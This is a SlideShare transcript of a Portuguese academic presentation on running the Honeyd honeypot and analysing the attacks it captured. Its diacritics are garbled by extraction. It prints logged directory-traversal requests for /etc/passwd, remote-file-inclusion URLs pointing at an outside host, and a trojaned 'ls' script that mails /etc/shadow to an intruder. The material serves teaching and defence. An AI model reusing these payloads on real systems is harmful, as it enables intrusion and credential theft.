Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Uso de HoneyPots com o Honeyd

       Pedro Pereira             Ulisses Costa

Criptografia e Seguran¸a de Sistemas de Info...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
O que s˜o HoneyPot’s?
       a




     Programas que emulam vulnerabilidades conhecidas
     Armadilhas para detectar ou ...
Tipos de HoneyPot’s




     Personalidade
         Alta interac¸˜o (high-interaction)
                     ca
         Ba...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Honeyd




     Cria¸˜o de hosts virtuais
         ca
     Configura¸˜o dos hosts
             ca
     Suporte para mais de...
Configura¸˜o do Honeyd
        ca



  bash > farpd 192.168.1.50 -i eth0



  # File : / etc / defaults / honeyd
  # Defaul...
O comando -c hostname:port:username:password




        Gera¸˜o de estat´
            ca          ısticas parciais do Hon...
Configura¸˜o do HoneyPot(1/2)
        ca

  # File : / etc / honeypot / honeyd . conf
  # Configuracao do honeypot
  create...
Configura¸˜o do HoneyPot(2/2)
        ca


  add win2k udp port 137 proxy          $ipsrc :137
  add win2k udp port 138 pro...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Ficheiros




  /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3
  /var/log/honeypot/web.log HTTP
  /var/log/honeypot/honeyd.l...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Formato do ficheiro /var/log/honeypot/honeyd.log

   Data     Protocolo   T           IPOrig         PortOrig     IPDst    ...
Formato do ficheiro /var/log/honeypot/honeyd.log




  2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.5...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
SMTP




   Usado do lado do servidor para enviar mensagens
   Para receber usams POP3 ou IMAP




             Pedro Pere...
SMTP - HoneyPot




           Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Comando EHLO em SMTP




    Comando para identificar clientes




              Pedro Pereira, Ulisses Costa   Uso de Hone...
Comando EHLO em SMTP

 S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329
       rea...
Spamm em servidores SMTP




            Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Solu¸oes
    c˜




     EHLO [host]
     verificar se resolvem




               Pedro Pereira, Ulisses Costa   Uso de Ho...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Ataques




  HELO 8 2.155.248.223
  MAIL FROM : < jk9l3g4jle@yahoo . com >
  RCPT TO : < ss e en n dd 12 0 1@ y ah oo . c...
Ataques


  HELO 82.155.251.32
  MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com >
  RCPT TO : < ss e en n dd 12 0 1@ y ah oo ....
Ataques



  HELO 8 2.155.103.147
  MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw >
  RCPT TO : < vjd39hww@yahoo ....
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
HTTP hit’s




             Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
User agent: webcollage/1.135a



  -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP
         quot; ,...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Directory traversal


           Tamb´m conhecido como dot dot slash attack (../)
               e
           Explora a in...
Directory traversal




  GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1



  --...
Directory traversal




  GET . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / etc / passwd HTTP /1.1...
Directory traversal




  GET . .  . .  . .  . .  . .  . .  . .  . .  . .  . .  etc  passwd HTTP /1.1



  -- MARK - - ,qu...
Directory traversal




  GET // etc / passwd HTTP /1.1




  -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; I...
Conclus˜o
       a




     No HoneyPot n˜o foi bem sucedido
                  a
     Sistema de baixa interactividade
   ...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Morfeus Scanner




     Procura vulnerabilidades PHP
     Vulnerabilidades conhecidas




               Pedro Pereira, U...
Morfeus Scanner - WebCalendar



        Cria¸˜o de calend´rios online
            ca           a
        Vulnerabilidade ...
Morfeus Scanner - Mambo Joomla


          CMS’s muito conhecido
          O atacante pretende definir a vari´vel
         ...
Prevenir ataques do Morfeus Scanner




  Uma maneira de bloquear este tipo de ataques vindos do MFS ´    e
  adicionar as...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Tentativa de brute force no servidor POP3




             Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Tentativa de brute force no servidor POP3
  ...
  -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / P...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
SSH
 Aqui est´ um gr´fico que mostra as tentativas de usernames:
         a      a




               Pedro Pereira, Ulisse...
SSH
 E o seguinte gr´fico mostra as tentativas de passwords:
                a




               Pedro Pereira, Ulisses Co...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
A amea¸a
      c




           Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Port scanning




      Descobrir m´quinas e respectivos portos
                 a
      Cria¸˜o de pacotes personalizados...
Port scanning




      Open ou Accepted: A m´quina enviou uma resposta a indicar
                              a
      qu...
Port scanning




  Tipos de t´cnicas
            e
      TCP/SYN
      TCP Connect
      UDP




                Pedro Pe...
TCP Connect




              Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Port scanning




  Optimiza¸˜o
          ca
  golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24
  ...
  Nm...
Ataque




     For¸a bruta / Dicion´rios
        c                a
     Explora¸˜o de vulnerabilidades
            ca


...
SSH




      Porto 22
      Atacado em For¸a bruta / Dicion´rios
                    c                a
      cat /var/lo...
SSH - log
  Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from
       89.235.152.18
  Dec 24 01:24:46 ...
SSH




      Defesa:
          IPTables
          passwords mais fortes
          Autentica¸˜o RSA
                   ca
...
SSH




      password m´
                ınimo de 8 caracteres
      password nao triviais
      combina¸˜es alfanum´rica...
SSH




 http://www.passwordmeter.com/



              Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
SSH - Autentica¸˜o RSA
               ca


       Geramos o par de chaves com o comando “ssh-keygen -t rsa”.
   1

       ...
Vulnerabilidades




      Comportamento n˜o previsto num artefacto de software
                     a
          Buffer Ove...
Explora¸˜o de vulnerabilidades
       ca


        Exploit
               ´
               E a designa¸˜o dada a um peda¸o...
Buffer Overflow




  user@honeypot :~ $ gcc exploit . c -o exploit
  user@honeypot :~ $ ./ exploit thisisanexploit
  *** st...
ShellCode




     Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o)
                          co         o      a     ...
RootKits




         Conjunto de programas malicionsos (trojans, backdoors

         chkrootkit e rkhunter (Linux)1 ;
   ...
Trojaned ls




  #!/ bin / bash

  mv / bin / ls / bin / ls . old

  / bin / echo quot; cat / etc / shadow | mail intruso...
Conclus˜o
       a




            Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Upcoming SlideShare
Loading in …5
×

Uso de Honeypots com Honeyd

1,431 views

Published on

Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Uso de Honeypots com Honeyd

  1. 1. Uso de HoneyPots com o Honeyd Pedro Pereira Ulisses Costa Criptografia e Seguran¸a de Sistemas de Informa¸˜o c ca 18 de Dezembro de 2008 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  2. 2. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  3. 3. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  4. 4. O que s˜o HoneyPot’s? a Programas que emulam vulnerabilidades conhecidas Armadilhas para detectar ou impedir ataques Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  5. 5. Tipos de HoneyPot’s Personalidade Alta interac¸˜o (high-interaction) ca Baixa interac¸˜o (low-interaction) ca Modus operandi Servidor Cliente Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  6. 6. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  7. 7. Honeyd Cria¸˜o de hosts virtuais ca Configura¸˜o dos hosts ca Suporte para mais de 1000 personalidades Muitas dezenas de scripts para emula¸˜o de servi¸os ca c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  8. 8. Configura¸˜o do Honeyd ca bash > farpd 192.168.1.50 -i eth0 # File : / etc / defaults / honeyd # Defaults for honeyd initscript # Correr como deamon RUN =quot; yes quot; # Interface de rede onde o honeyd vai escutar pedidos INTERFACE =quot; eth0 quot; # Rede que o honeyd simula NETWORK =192.168.1.50 # Conjunto de opcoes # -c hostname : port : username : password OPTIONS =quot; - c localhost :12345: username : password quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  9. 9. O comando -c hostname:port:username:password Gera¸˜o de estat´ ca ısticas parciais do Honeyd bash > honeydstats -- os_report / etc / honeypot / os -- port_report / etc / honeypot / port -- spammer_report / etc / honeypot / spam -- country_report / etc / honeypot / country -f / etc / honeypot / honeydstats . conf -l localhost -p 12345 # File : / etc / honeypot / honeydstats . conf # Ficheiro de configuracao do honeydstats username : password Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  10. 10. Configura¸˜o do HoneyPot(1/2) ca # File : / etc / honeypot / honeyd . conf # Configuracao do honeypot create win2k set win2k personality quot; Microsoft Windows 2000 SP2 quot; set win2k default tcp action reset set win2k default udp action reset set win2k default icmp action block set win2k uptime 3567 add win2k tcp port 21 quot; sh / usr / share / honeyd / scripts / win32 / win2k / msftp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 23 quot; perl / usr / share / honeyd / scripts / unix / linux / suse7 .0/ telnetd . sh quot; add win2k tcp port 25 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - smtp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 80 quot; sh / usr / share / honeyd / scripts / win32 / win2k / iis . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 110 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - pop3 . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 143 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - imap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 389 quot; sh / usr / share / honeyd / scripts / win32 / win2k / ldap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 5901 quot; sh / usr / share / honeyd / scripts / win32 / win2k / vnc . sh $ipsrc $sport $ipdst $dport quot; add win2k udp port 161 quot; perl / usr / share / honeyd / scripts / unix / general / snmp / fake - snmp . pl public private -- config = scripts / unix / general quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  11. 11. Configura¸˜o do HoneyPot(2/2) ca add win2k udp port 137 proxy $ipsrc :137 add win2k udp port 138 proxy $ipsrc :138 add win2k udp port 445 proxy $ipsrc :445 add win2k tcp port 137 proxy $ipsrc :137 add win2k tcp port 138 proxy $ipsrc :138 add win2k tcp port 139 proxy $ipsrc :139 add win2k tcp port 445 proxy $ipsrc :445 bind 192.168.1.50 win2k$ Imposs´ monitorizar portos NETBIOS ıvel Grade complexidade Decis˜o reencaminhar para source a Inicializar o nosso HoneyPot: bash > / etc / init . d / honeyd start Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  12. 12. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  13. 13. Ficheiros /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3 /var/log/honeypot/web.log HTTP /var/log/honeypot/honeyd.log Log principal do Honeyd Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  14. 14. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  15. 15. Formato do ficheiro /var/log/honeypot/honeyd.log Data Protocolo T IPOrig PortOrig IPDst PortDst Info Comment´rio a ... tcp(6) S 88.44.123.210 3637 ... 139 [Windows XP SP1] ... tcp(6) S 82.155.0.49 22617 ... 139 ... tcp(6) E 82.155.1.160 4399 ... 445: 00 ... tcp(6) - 82.155.122.18 61582 ... 139: 40 R ... icmp(1) - 80.236.5.27 ...: 3(13): 56 ... tcp(6) - 82.154.64.174 34507 ... 445: 40 RA ... tcp(6) - 124.8.74.33 1806 ... 25: 70 FPA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA ... tcp(6) - 82.155.57.245 58274 ... 445: 52 PA [Windows XP SP1] ... tcp(6) - 193.136.19.149 58274 ... 445: 52 PA ... tcp(6) - 88.175.73.149 4332 ... 139: 40 R [Windows XP SP1] ... tcp(6) - 82.155.137.139 1230 ... 445: 40 A [Windows XP SP1] ... tcp(6) - 82.155.7.176 2794 ... 445: 40 A ... tcp(6) - 82.155.116.238 3578 ... 23: 60 S [Linux 2.6 .1-7] ... tcp(6) - 124.207.41.198 48804 ... 23: 40 S ... udp(17) - 192.168.1.254 67 ... 68: 298 Data no formato: 2008-12-15-22:59:03.4039 IPDst ´ sempre o mesmo (neste caso) - 192.168.1.50 e Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  16. 16. Formato do ficheiro /var/log/honeypot/honeyd.log 2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.50 80 2009 -01 -01 -05:58:40.3750 tcp (6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008 Para TCP e UDP n˜o s˜o gravadas todas as transmiss˜es de aa o pacotes Seria demasiando verboso Apenas a quantidade transmitida Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  17. 17. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  18. 18. SMTP Usado do lado do servidor para enviar mensagens Para receber usams POP3 ou IMAP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  19. 19. SMTP - HoneyPot Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  20. 20. Comando EHLO em SMTP Comando para identificar clientes Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  21. 21. Comando EHLO em SMTP S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009 C : EHLO windows S : 250 - bps - pc9 . local . mynet Hello [12] S : 250 - TURN S : 250 - ATRN S : 250 - SIZE S : 250 - ETRN S : 250 - PIPELINING S : 250 - DSN S : 250 - E N H A N C E D S T A TU S C O D E S S : 250 -8 bitmime S : 250 - BINARYMIME S : 250 - CHUNKING S : 250 - VRFY S : 250 - X - EXPS GSSAPI NTLM LOGIN S : 250 - X - EXPS = LOGIN S : 250 - AUTH GSSAPI NTLM LOGIN S : 250 - AUTH = LOGIN S : 250 - X - LINK2STATE S : 250 - XEXCH50 } S : 250 OK Identifica¸˜o por nomes de dominios n˜o reais ca a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  22. 22. Spamm em servidores SMTP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  23. 23. Solu¸oes c˜ EHLO [host] verificar se resolvem Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  24. 24. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  25. 25. Ataques HELO 8 2.155.248.223 MAIL FROM : < jk9l3g4jle@yahoo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.248.223 2008 -12 -11 -09:45:27.9566 tcp (6) S 124.11.193.219 2774 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -11 -09:46:33.6989 tcp (6) E 124.11.193.219 2774 192.168.1.50 25: 178 920 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  26. 26. Ataques HELO 82.155.251.32 MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.251.32 2008 -12 -23 -12:18:11.3939 tcp (6) S 114.44.42.34 2748 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:11.3953 tcp (6) S 114.44.42.34 2750 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:12.1966 tcp (6) E 114.44.42.34 2750 192.168.1.50 25: 0 116 2008 -12 -23 -12:18:13.1996 tcp (6) E 114.44.42.34 2748 192.168.1.50 25: 0 232 2008 -12 -23 -12:21:55.1773 tcp (6) S 114.44.42.34 3347 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:21:57.1324 tcp (6) E 114.44.42.34 3347 192.168.1.50 25: 0 232 2008 -12 -23 -14:06:30.5003 tcp (6) S 114.44.42.34 1634 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:30.5023 tcp (6) S 114.44.42.34 1635 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:43.0390 tcp (6) E 114.44.42.34 1635 192.168.1.50 25: 177 335 2008 -12 -23 -14:06:51.4612 tcp (6) E 114.44.42.34 1634 192.168.1.50 25: 177 418 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  27. 27. Ataques HELO 8 2.155.103.147 MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw > RCPT TO : < vjd39hww@yahoo . com . tw > DATA Received : from ( [ 1 4 5 . 2 0 0. 2 0 1 . 1 1 4 ] ) by 82 .155.103.147 id <9624303 -98482 >; Tue , 06 Jan 2009 21:16:04 -0100 Message - ID : < w58 $6a4j1fqc6q@ocjc8ujvz > From : quot;quot; < t t c5 85 t tc 5 85 @y a ho o . com . tw > To : < vjd39hww@yahoo . com . tw > Subject : BC_82 .155.103.147 Date : Tue , 06 Jan 09 21:16:04 GMT MIME - Version : 1.0 Content - Type : multipart / alternative ; boundary =quot; - - - -= _ N e x t P a r t _ 0 0 0 _ 0 0 0 D _ 0 1 C 2 C C 6 0 .49 F4EC70 quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  28. 28. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  29. 29. HTTP hit’s Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  30. 30. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  31. 31. User agent: webcollage/1.135a -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;92.240.68.152quot; ,quot;192.168.1.50quot; ,56886 ,80 , quot; GET http :// www . morgangirl . com / pics / land / land1 . jpg HTTP /1.0 User - Agent : webcollage /1.135 a Referer : http :// random . yahoo . com / fast / ryl Host : www . morgangirl . com quot;, -- ENDMARK - - Tentativa de obter uma imagem atrav´s do HoneyPot e HoneyPotpode ter sido “visto” por um proxy scanner HoneyPot como um proxy aberto Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  32. 32. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  33. 33. Directory traversal Tamb´m conhecido como dot dot slash attack (../) e Explora a insuficiˆncia de valida¸˜o de pedidos e ca Ficheiros do sistema GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:57 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59706 ,80 , quot; GET %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  34. 34. Directory traversal GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:58 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59711 ,80 , quot; GET %2 E %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  35. 35. Directory traversal GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:02 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59727 ,80 , quot; GET %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 Fetc %5 C %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  36. 36. Directory traversal GET . . . . . . . . . . . . . . . . . . . . etc passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:04 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59740 ,80 , quot; GET %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 Cetc %5 Cpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  37. 37. Directory traversal GET // etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59700 ,80 , quot; GET %2 F %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  38. 38. Conclus˜o a No HoneyPot n˜o foi bem sucedido a Sistema de baixa interactividade No nosso HoneyPot erro 302 Object moved Utiliza¸˜o de NMap scripting engine ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  39. 39. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  40. 40. Morfeus Scanner Procura vulnerabilidades PHP Vulnerabilidades conhecidas Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  41. 41. Morfeus Scanner - WebCalendar Cria¸˜o de calend´rios online ca a Vulnerabilidade no ficheiro send reminder.php -- MARK - - ,quot; Wed Dec 24 16:07:29 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,54941 ,80 , quot; GET / webcalendar / tools / send_reminders . php ? noSet =0& includedir = http : / / 2 17 .2 0 .1 7 2. 12 9 / twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  42. 42. Morfeus Scanner - Mambo Joomla CMS’s muito conhecido O atacante pretende definir a vari´vel a mosConfig absolute path do ficheiro index.php -- MARK - - ,quot; Wed Dec 24 16:07:34 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,55438 ,80 , quot; GET / shop / index . php ? option = com_registration & task = register // boutique / index2 . php ? _REQUEST =& _REQUEST %5 boption %5 d = com_content & _REQUEST %5 bItemid %5 d =1& GLOBALS =& m o s C o n f i g _ a b s o l u t e _ p a t h = http :/ / 21 7 .2 0. 1 72 . 12 9/ twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
